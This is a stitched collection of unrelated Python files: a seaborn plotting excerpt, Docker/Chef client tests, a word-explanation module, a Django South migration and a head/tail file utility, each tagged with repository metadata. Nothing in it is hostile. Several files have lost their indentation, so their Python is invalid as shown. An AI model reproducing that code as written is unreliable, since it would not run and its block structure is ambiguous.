# TODO process pair parameters for bins, etc. and pass
        # to both joint and marginal plots
joint_kws.setdefault("color", color)
grid.plot_joint(histplot, **joint_kws)
marginal_kws.setdefault("kde", False)
marginal_kws.setdefault("color", color)
marg_x_kws = marginal_kws.copy()
marg_y_kws = marginal_kws.copy()
pair_keys = "bins", "binwidth", "binrange"
for key in pair_keys:
if isinstance(joint_kws.get(key), tuple):
x_val, y_val = joint_kws[key]
marg_x_kws.setdefault(key, x_val)
marg_y_kws.setdefault(key, y_val)
histplot(data=data, x=x, hue=hue, **marg_x_kws, ax=grid.ax_marg_x)
histplot(data=data, y=y, hue=hue, **marg_y_kws, ax=grid.ax_marg_y)
elif kind.startswith("kde"):
joint_kws.setdefault("color", color)
joint_kws.setdefault("warn_singular", False)
grid.plot_joint(kdeplot, **joint_kws)
marginal_kws.setdefault("color", color)
if "fill" in joint_kws:
marginal_kws.setdefault("fill", joint_kws["fill"])
grid.plot_marginals(kdeplot, **marginal_kws)
elif kind.startswith("hex"):
x_bins = min(_freedman_diaconis_bins(grid.x), 50)
y_bins = min(_freedman_diaconis_bins(grid.y), 50)
gridsize = int(np.mean([x_bins, y_bins]))
joint_kws.setdefault("gridsize", gridsize)
joint_kws.setdefault("cmap", cmap)
grid.plot_joint(plt.hexbin, **joint_kws)
marginal_kws.setdefault("kde", False)
marginal_kws.setdefault("color", color)
grid.plot_marginals(histplot, **marginal_kws)
elif kind.startswith("reg"):
marginal_kws.setdefault("color", color)
marginal_kws.setdefault("kde", True)
grid.plot_marginals(histplot, **marginal_kws)
joint_kws.setdefault("color", color)
grid.plot_joint(regplot, **joint_kws)
elif kind.startswith("resid"):
joint_kws.setdefault("color", color)
grid.plot_joint(residplot, **joint_kws)
x, y = grid.ax_joint.collections[0].get_offsets().T
marginal_kws.setdefault("color", color)
histplot(x=x, hue=hue, ax=grid.ax_marg_x, **marginal_kws)
histplot(y=y, hue=hue, ax=grid.ax_marg_y, **marginal_kws)
return grid
jointplot.__doc__ = """\
Draw a plot of two variables with bivariate and univariate graphs.
This function provides a convenient interface to the :class:`JointGrid`
class, with several canned plot kinds. This is intended to be a fairly
lightweight wrapper; if you need more flexibility, you should use
:class:`JointGrid` directly.
Parameters
----------
{params.core.xy}
{params.core.data}
kind : {{ "scatter" | "kde" | "hist" | "hex" | "reg" | "resid" }}
Kind of plot to draw. See the examples for references to the underlying functions.
{params.core.color}
height : numeric
Size of the figure (it will be square).
ratio : numeric
Ratio of joint axes height to marginal axes height.
space : numeric
Space between the joint and marginal axes
dropna : bool
If True, remove observations that are missing from ``x`` and ``y``.
{{x, y}}lim : pairs of numbers
Axis limits to set before plotting.
marginal_ticks : bool
If False, suppress ticks on the count/density axis of the marginal plots.
{{joint, marginal}}_kws : dicts
Additional keyword arguments for the plot components.
{params.core.hue}
Semantic variable that is mapped to determine the color of plot elements.
{params.core.palette}
{params.core.hue_order}
{params.core.hue_norm}
kwargs
Additional keyword arguments are passed to the function used to
draw the plot on the joint Axes, superseding items in the
``joint_kws`` dictionary.
Returns
-------
{returns.jointgrid}
See Also
--------
{seealso.jointgrid}
{seealso.pairgrid}
{seealso.pairplot}
Examples
--------
.. include:: ../docstrings/jointplot.rst
""".format(
params=_param_docs,
returns=_core_docs["returns"],
seealso=_core_docs["seealso"],
)
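# Illustrative sketch: a hex-bin jointplot over synthetic data, exercising the
# kind="hex" branch above (hexbin joint axes, histogram marginals). The data,
# column names, and helper name are assumptions made purely for demonstration.
def _jointplot_usage_sketch():
    """Hex-bin joint plot with histogram marginals."""
    rng = np.random.RandomState(0)
    df = pd.DataFrame({"x": rng.gamma(2., size=500), "y": rng.normal(size=500)})
    return jointplot(data=df, x="x", y="y", kind="hex")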
| mwaskom/seaborn | seaborn/axisgrid.py | Python | bsd-3-clause | 87,264 | 0.000562 |
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Docker client tests"""
from __future__ import unicode_literals
import mock
import docker
from docker.errors import DockerException
from oslo_config import cfg
from validator.common.exception import DockerContainerException
import validator.tests.base as tb
from validator.clients.chef_client import ChefClient
CONF = cfg.CONF
CONF.import_group('clients_chef', 'validator.clients.chef_client_ssh')
class ChefClientTestCase(tb.ValidatorTestCase):
"""Docker Client unit tests"""
def setUp(self):
""" Create a docker client"""
super(ChefClientTestCase, self).setUp()
self.client = ChefClient()
CONF.set_override('cmd_test', "cmdtest {}", group='clients_chef')
CONF.set_override('cmd_install', "cmdinstall {}", group='clients_chef')
CONF.set_override('cmd_inject', "cmdinject {}", group='clients_chef')
CONF.set_override('cmd_launch', "cmdlaunch {}", group='clients_chef')
def test_create_client(self):
""" Test client creation"""
self.assertRaises(DockerException, ChefClient, 'fakeurl')
self.assertIsInstance(self.client.dc, docker.client.Client)
def test_run_container(self):
""" Test container deployment"""
self.assertRaises(DockerContainerException, self.client.run_container, "fakeimage")
self.client.dc = mock.MagicMock()
self.client.run_container('validimage')
self.client.dc.create_container.assert_called_once_with('validimage', name=u'validimage-validate', tty=True)
self.client.dc.start.assert_called_once_with(container=self.client.container)
def test_stop_container(self):
""" Test stopping and removing a container"""
self.client.dc = self.m.CreateMockAnything()
self.client.dc.stop(self.client.container)
self.client.dc.remove_container(self.client.container)
self.m.ReplayAll()
self.client.remove_container()
self.m.VerifyAll()
def test_run_deploy(self):
self.client.execute_command = mock.MagicMock()
self.client.execute_command.return_value = "Alls good"
self.client.run_deploy("mycookbook")
obs = self.client.run_test("fakecookbook")
expected = "{'response': u'Alls good', 'success': True}"
self.assertEqual(expected, str(obs))
def test_run_install(self):
self.client.execute_command = self.m.CreateMockAnything()
self.client.container = "1234"
self.client.execute_command('cmdinstall fakecookbook').AndReturn("Alls good")
self.m.ReplayAll()
obs = self.client.run_install("fakecookbook")
expected = "{'response': u'Alls good', 'success': True}"
self.assertEqual(expected, str(obs))
self.m.VerifyAll()
def test_run_test(self):
self.client.execute_command = self.m.CreateMockAnything()
self.client.container = "1234"
self.client.execute_command('cmdtest fakecookbook').AndReturn("Alls good")
self.m.ReplayAll()
obs = self.client.run_test("fakecookbook")
expected = "{'response': u'Alls good', 'success': True}"
self.assertEqual(expected, str(obs))
self.m.VerifyAll()
def test_execute_command(self):
"""Test a command execution in container"""
self.client.dc = self.m.CreateMockAnything()
self.client.container = "1234"
self.client.dc.exec_create(cmd='/bin/bash -c "mycommand"', container=u'1234').AndReturn("validcmd")
self.client.dc.exec_start("validcmd").AndReturn("OK")
self.m.ReplayAll()
obs = self.client.execute_command("mycommand")
self.assertEqual("OK",obs)
self.m.VerifyAll()
def tearDown(self):
""" Cleanup environment"""
super(ChefClientTestCase, self).tearDown()
self.m.UnsetStubs()
self.m.ResetAll()
| pmverdugo/fiware-validator | validator/tests/clients/test_chef_client.py | Python | apache-2.0 | 4,428 | 0.001807 |
import itertools
import random
from hb_res.explanation_source import sources_registry, ExplanationSource
__author__ = 'moskupols'
ALL_SOURCES = sources_registry.sources_registered()
ALL_SOURCES_NAMES_SET = frozenset(sources_registry.names_registered())
all_words_list = []
words_list_by_source_name = dict()
for s in ALL_SOURCES:
li = list(s.explainable_words())
words_list_by_source_name[s.name] = li
all_words_list.extend(li)
all_words_set = frozenset(all_words_list)
SELECTED_SOURCE = sources_registry.source_for_name('Selected')
SELECTION_LEVELS = {'good', 'all'}
def _pick_sources_by_names(names):
if names is None:
sources_filtered = ALL_SOURCES
else:
if isinstance(names, str):
names = [names]
sources_filtered = list(map(sources_registry.source_for_name, names))
return sources_filtered
def get_explainable_words(sources=None):
"""
Returns an iterable of all words for which we have any explanation.
:return: iterable
"""
sources = _pick_sources_by_names(sources)
    return itertools.chain.from_iterable(
        map(ExplanationSource.explainable_words, sources))
def get_random_word(*, sources_names=None, selection_level=None):
# assert sources_names is None or selection_level is None
if sources_names is None:
return random.choice(all_words_list
if selection_level == 'all'
else words_list_by_source_name['Selected'])
# If the user wants a sole specific asset, the task is straightforward
if not isinstance(sources_names, str) and len(sources_names) == 1:
sources_names = sources_names[0]
if isinstance(sources_names, str):
return random.choice(words_list_by_source_name[sources_names])
# otherwise we have to pick a uniformly random element from several lists,
# but we wouldn't like to join them, as they are long
lists = [words_list_by_source_name[name] for name in sources_names]
total = sum(map(len, lists))
rand = random.randrange(total)
upto = 0
for word_list in lists:
upto += len(word_list)
if rand < upto:
return word_list[rand - upto] # yep, negative indexation
assert False, 'Shouldn\'t get here'
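# Illustrative sketch: the selection trick used in get_random_word above,
# shown in isolation. To pick a uniformly random element from several lists
# without concatenating them, draw an index in [0, total) and walk the
# cumulative lengths until it falls inside one of the lists. The helper name
# is an assumption for demonstration; it is not used elsewhere.
def _pick_uniform_from_lists(lists):
    total = sum(map(len, lists))
    rand = random.randrange(total)
    upto = 0
    for lst in lists:
        upto += len(lst)
        if rand < upto:
            return lst[rand - upto]  # negative index into this list
    raise AssertionError("unreachable: rand < total by construction")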
def explain_list(word, sources_names=None):
"""
Returns list of tuples (Explanations, asset_name)
"""
if word not in all_words_set:
return []
sources_filtered = _pick_sources_by_names(sources_names)
res = list()
for s in sources_filtered:
res.extend(zip(s.explain(word), itertools.repeat(s.name)))
random.shuffle(res)
return res
def explain(word, sources_names=None):
"""
Returns a tuple (Explanation, asset_name)
:param word: a russian noun in lowercase
:return: the explanation
"""
explanations = explain_list(word, sources_names)
return explanations[0] if len(explanations) else None
| hatbot-team/hatbot | explanator/_explanator.py | Python | mit | 2,930 | 0 |
class DestinationNotFoundException(Exception):
pass
class InvalidDateFormat(Exception):
pass
| kapucko/bus-train-search | btsearch/exceptions.py | Python | apache-2.0 | 101 | 0.019802 |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Face.district_id'
db.add_column(u'faces_face', 'district_id',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['faces.District'], null=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Face.district_id'
db.delete_column(u'faces_face', 'district_id_id')
models = {
'album.imagecollection': {
'Meta': {'object_name': 'ImageCollection'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'zip_import': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'blank': 'True'})
},
'album.imagecollectionimage': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'ImageCollectionImage'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'file': ('mezzanine.core.fields.FileField', [], {'max_length': '200'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_collection': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'images'", 'to': "orm['album.ImageCollection']"}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
'faces.district': {
'Meta': {'object_name': 'District'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'district': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'district_description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'faces.face': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Face'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'district': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'district_id': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['faces.District']", 'null': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_collection': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['album.ImageCollection']"}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_pinned': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'zip_import': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'blank': 'True'})
},
'faces.faceimage': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'FaceImage'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'face': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'images'", 'to': u"orm['faces.Face']"}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_collection_image': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'face_image'", 'to': "orm['album.ImageCollectionImage']"}),
'image_file': ('mezzanine.core.fields.FileField', [], {'max_length': '200', 'null': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_pinned': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'sites.site': {
'Meta': {'ordering': "(u'domain',)", 'object_name': 'Site', 'db_table': "u'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['faces']
| RuralIndia/pari | pari/faces/migrations/0006_auto__add_field_face_district_id.py | Python | bsd-3-clause | 11,120 | 0.009083 |
import sys
import os
import re
def human_size_to_byte(number):
"""
Convert number of these units to bytes, ignore case:
b : 512
kB : 1000
K : 1024
mB : 1000*1000
m : 1024*1024
MB : 1000*1000
M : 1024*1024
GB : 1000*1000*1000
G : 1024*1024*1024
TB : 1000*1000*1000*1000
T : 1024*1024*1024*1024
PB : 1000*1000*1000*1000*1000
P : 1024*1024*1024*1024*1024
EB : 1000*1000*1000*1000*1000*1000
E : 1024*1024*1024*1024*1024*1024
ZB : 1000*1000*1000*1000*1000*1000*1000
Z : 1024*1024*1024*1024*1024*1024*1024
YB : 1000*1000*1000*1000*1000*1000*1000*1000
Y : 1024*1024*1024*1024*1024*1024*1024*1024
number is of one of these forms:
123, 123b, 123M, 1G
"""
mapping = {
'b' : 512 ,
'kb' : 1000,
'k' : 1024,
'mb' : 1000**2,
'm' : 1024**2,
'gb' : 1000**3,
'g' : 1024**3,
'tb' : 1000**4,
't' : 1024**4,
'pb' : 1000**5,
'p' : 1024**5,
'eb' : 1000**6,
'e' : 1024**6,
'zb' : 1000**7,
'z' : 1024**7,
'yb' : 1000**8,
'y' : 1024**8,
}
unit = re.sub('^[0-9]+', '', number)
if unit:
unit = unit.lower()
assert unit in mapping.keys(), "wrong unit %s " % unit
amount = int(number[:-len(unit)])
return mapping[unit] * amount
else:
return int(number)
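# Illustrative worked examples for human_size_to_byte, following directly from
# the mapping above. The helper is only a sketch and is not used elsewhere.
def _human_size_examples():
    assert human_size_to_byte('123') == 123        # no unit: plain bytes
    assert human_size_to_byte('3b') == 3 * 512     # 'b' means 512-byte blocks
    assert human_size_to_byte('2k') == 2 * 1024    # one-letter units are binary
    assert human_size_to_byte('2kB') == 2 * 1000   # two-letter units are decimal
    assert human_size_to_byte('1G') == 1024 ** 3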
def correct_offset(file):
"""Due to Python cache issue, the real file offset of the
underlying file descriptor may differ, this function can correct
it.
"""
cur = file.seek(0, 1)
file.seek(0, 2)
file.seek(cur)
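# Illustrative sketch: why correct_offset matters. A buffered file object may
# have read ahead, so the OS-level offset of its descriptor sits past the
# logical position reported by tell(); seeking away and back discards the read
# buffer so the two agree again. The helper below is an assumption for
# demonstration and is not used elsewhere.
def _offsets_before_and_after(path):
    with open(path, 'rb') as f:
        f.read(1)                                      # triggers read-ahead
        logical = f.tell()
        raw_before = os.lseek(f.fileno(), 0, os.SEEK_CUR)
        correct_offset(f)
        raw_after = os.lseek(f.fileno(), 0, os.SEEK_CUR)
        return logical, raw_before, raw_after          # raw_after == logical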
def open_file(file):
if file == '-':
return os.fdopen(sys.stdin.fileno(), 'rb')
else:
return open(file, 'rb')
class Locator:
"""Search from the end of the file backward, locate the starting
offset of the specified amount, measured by line, or by byte.
"""
def __init__(self, ifile, mode, amount, bs=8192):
"""mode can be 'lines' or 'bytes'"""
assert ifile.seekable(), "input file is not seekable"
self.orig_pos = ifile.seek(0, 1)
self.ifile = ifile
self.mode = mode
self.amount = amount
self.bs = bs
def find_line(self, ifile, chunk, amount):
""" Find if data chunk contains 'amount' number of lines.
Return value: (stat, pos, remaining-amount). If stat is True,
pos is the result, otherwise pos is not used, remaining-amount
is for the next run.
"""
count = chunk.count(b'\n')
if count <= amount:
amount -= count
return False, 0, amount
else: # found
pos = -1
for i in range(count - amount):
pos = chunk.index(b'\n', pos+1)
pos += 1
diff = len(chunk) - pos
pos = ifile.seek(-diff, 1)
return True, pos, 0
def find_byte(self, ifile, chunk, amount):
""" Find if data chunk contains 'amount' number of bytes.
Return value: (stat, pos, remaining-amount). If stat is True,
pos is the result, otherwise pos is not used, remaining-amount
is for the next run.
"""
length = len(chunk)
if length < amount:
amount -= length
return False, 0, amount
else: # found
pos = ifile.seek(-amount, 1)
return True, pos, 0
def find(self, ifile, offset, size, amount):
"""Read 'size' bytes starting from offset to find.
Return value: (stat, pos, remaining-amount). If stat is True,
pos is the result, otherwise pos is not used, remaining-amount
is for the next run.
"""
try:
pos = ifile.seek(offset)
except OSError:
assert False, "unkown file seeking failure"
chunk = ifile.read(size)
if self.mode == 'lines':
return self.find_line(ifile, chunk, amount)
else:
return self.find_byte(ifile, chunk, amount)
def run(self):
"""Find the offset of the last 'amount' lines"""
ifile = self.ifile
amount = self.amount
orig_pos = self.orig_pos
end = ifile.seek(0, 2) # jump to the end
# nothing to process, return the original position
total = end - orig_pos
if total <= amount:
correct_offset(ifile)
return orig_pos
bs = self.bs
# process the last block
remaining = total % bs
offset = end - remaining
stat, pos, amount = self.find(ifile, offset, remaining, amount)
while not stat and offset != orig_pos:
offset -= bs
stat, pos, amount = self.find(ifile, offset, bs, amount)
ifile.seek(self.orig_pos)
correct_offset(ifile)
return pos
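# Illustrative sketch: using Locator to find where the last N lines of a
# seekable file begin, which is the heart of a `tail -n N` implementation.
# The helper name and default are assumptions for demonstration only.
def _read_last_lines(path, n=10):
    with open(path, 'rb') as f:
        start = Locator(f, 'lines', n).run()  # offset where the tail starts
        f.seek(start)
        return f.read()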
class Buffer:
def __init__(self, amount):
self.min = amount
self.total = 0
self.data = []
def push(self, pair):
self.data.append(pair)
self.total += pair[0]
def pop(self):
pair = self.data.pop(0)
self.total -= pair[0]
return pair
def cut(self):
"""Pop as many pairs off the head of the self.data as
self.is_ready() is True, return a combined result.
"""
count = 0
data = b''
while self.is_ready():
x, y = self.pop()
count += x
data += y
return count, data
def is_satisfied(self):
"""The minimum amount is satisfied"""
return self.total >= self.min
def is_ready(self):
"""The buffer is ready to pop"""
return self.total - self.data[0][0] >= self.min
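# Illustrative sketch: how Buffer is meant to be driven. It withholds at least
# `min` units at the tail of the stream; cut() releases whatever is safely in
# excess of that minimum. The helper is an assumption for demonstration only.
def _buffer_demo():
    buf = Buffer(2)                    # always keep at least 2 lines back
    buf.push((1, b'line1\n'))
    buf.push((1, b'line2\n'))
    assert not buf.is_ready()          # popping now would dip below the minimum
    buf.push((1, b'line3\n'))
    assert buf.is_ready()
    count, data = buf.cut()            # releases the excess from the head
    assert (count, data) == (1, b'line1\n')
    assert buf.total == 2              # the minimum is still held back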
class HeadWorkerSL:
"""Seekable, line mode"""
def __init__(self, ifile, ofile, amount, bs=None):
self.ifile = ifile
self.ofile = ofile
self.amount = amount
self.bs = bs or 8192
def read(self):
return self.ifile.read(self.bs)
def transform(self, data):
return data.count(b'\n')
def is_last(self, count):
return count >= self.amount
def action(self, data, count):
self.ofile.write(data)
self.amount -= count
def handle_last(self, data):
pos = -1
for i in range(self.amount):
pos = data.index(b'\n', pos+1)
pos += 1
self.ofile.write(data[:pos])
over_read = len(data) - pos
try:
self.ifile.seek(-over_read, 1)
except Exception:
pass
def run(self):
while self.amount:
data = self.read()
if not data:
break
count = self.transform(data)
if self.is_last(count):
self.handle_last(data)
break
else:
self.action(data, count)
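# Illustrative sketch: wiring HeadWorkerSL up as a minimal `head -n N` over a
# seekable file, writing to standard output. The helper name and default are
# assumptions for demonstration only.
def _head_lines(path, n=10):
    with open(path, 'rb') as f:
        HeadWorkerSL(f, sys.stdout.buffer, n).run()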
class HeadWorkerSB(HeadWorkerSL):
"""Seekable, byte mode"""
def transform(self, data):
return len(data)
def handle_last(self, data):
self.ofile.write(data[:self.amount])
over_read = len(data) - self.amount
try:
self.ifile.seek(-over_read, 1)
except Exception:
pass
class HeadWorkerTL(HeadWorkerSL):
"""Terminal, line mode"""
def read(self):
return self.ifile.readline()
def action(self, data, count):
self.ofile.write(data)
self.amount -= 1
self.ofile.flush()
def handle_last(self, data):
self.ofile.write(data)
self.ofile.flush()
class HeadWorkerTB(HeadWorkerSB):
"""Terminal, byte mode"""
def read(self):
return self.ifile.readline()
class HeadWorkerULIT(HeadWorkerSL):
"""Unseekable, line mode ignore tail"""
def __init__(self, ifile, ofile, amount, bs=None):
self.ifile = ifile
self.ofile = ofile
self.amount = amount
self.bs = bs or 8192
def read(self):
return self.ifile.read(self.bs)
def transform(self, data):
return data.count(b'\n')
def fill(self):
"""Fill up the buffer with content from self.ifile"""
amount = self.amount
buffer = Buffer(amount)
while True:
data = self.read()
if not data:
break
count = self.transform(data)
buffer.push((count, data))
if buffer.is_satisfied():
break
return buffer
def step(self, buffer):
"""Read and process the self.ifile step by step,
return False if nothing left in self.ifile.
"""
data = self.read()
if not data:
return False
count = self.transform(data)
buffer.push((count, data))
if buffer.is_ready():
x, data = buffer.cut()
self.proc(data)
return True
def proc(self, data):
self.ofile.write(data)
self.ofile.flush()
def handle_last(self, buffer):
while True:
x, data = buffer.pop()
if buffer.is_satisfied():
self.proc(data)
else:
diff = buffer.min - buffer.total
lines = data.splitlines(keepends=True)
self.ofile.writelines(lines[:-diff])
break
self.ofile.flush()
def run(self):
buffer = self.fill()
if buffer.is_satisfied():
while self.step(buffer):
pass
self.handle_last(buffer)
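# Illustrative sketch: HeadWorkerULIT realises the `head -n -K` behaviour
# (emit everything except the last K lines) for input that cannot seek, by
# always holding at least K lines in the Buffer before letting output through.
# Reading a pipe on stdin is the assumed use; the helper is for demonstration
# only.
def _head_all_but_last(k=5):
    HeadWorkerULIT(sys.stdin.buffer, sys.stdout.buffer, k).run()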
class HeadWorkerTLIT(HeadWorkerULIT):
"""Terminal, line mode ignore tail"""
def read(self):
return self.ifile.readline()
class HeadWorkerUBIT(HeadWorkerULIT):
"""Unseekable, byte mode ignore tail"""
def transform(self, data):
return len(data)
def handle_last(self, buffer):
while True:
x, data = buffer.pop()
if buffer.is_satisfied():
self.ofile.write(data)
else:
diff = buffer.min - buffer.total
self.ofile.write(data[:-diff])
break
self.ofile.flush()
class HeadWorkerTBIT(HeadWorkerUBIT):
"""Terminal, byte mode ignore tail"""
def read(self):
return self.ifile.readline()
class Mixin:
def copy_to_end(self):
while True:
chunk = self.read()
if not chunk:
break
self.ofile.write(chunk)
class TailWorkerSLIH(HeadWorkerSL, Mixin):
"""Seekable, line mode, ignore head"""
def __init__(self, ifile, ofile, amount, bs=None):
super(TailWorkerSLIH, self).__init__(ifile, ofile, amount, bs)
if amount > 0:
self.amount -= 1
def action(self, data, count):
self.amount -= count
def handle_last(self, data):
pos = -1
for i in range(self.amount):
pos = data.index(b'\n', pos+1)
pos += 1
self.ofile.write(data[pos:])
self.copy_to_end()
class TailWorkerSBIH(TailWorkerSLIH):
"""Seekable, byte mode, ignore head"""
def transform(self, data):
return len(data)
def handle_last(self, data):
self.ofile.write(data[self.amount:])
self.copy_to_end()
class TailWorkerSB(TailWorkerSLIH):
def __init__(self, ifile, ofile, bs=None):
self.ifile = ifile
self.ofile = ofile
self.bs = bs or 8192
def run(self):
self.copy_to_end()
class TailWorkerULIH(HeadWorkerULIT, Mixin):
"""Unseekable, line mode ignore head"""
def proc(self, data):
"""Just ignore the data"""
def handle_last(self, buffer):
while True:
x, data = buffer.pop()
if not buffer.is_satisfied():
diff = buffer.min - buffer.total
self.split_and_proc(data, diff)
for x, data in buffer.data:
self.ofile.write(data)
break
def split_and_proc(self, data, diff):
lines = data.splitlines(keepends=True)
self.ofile.writelines(lines[-diff:])
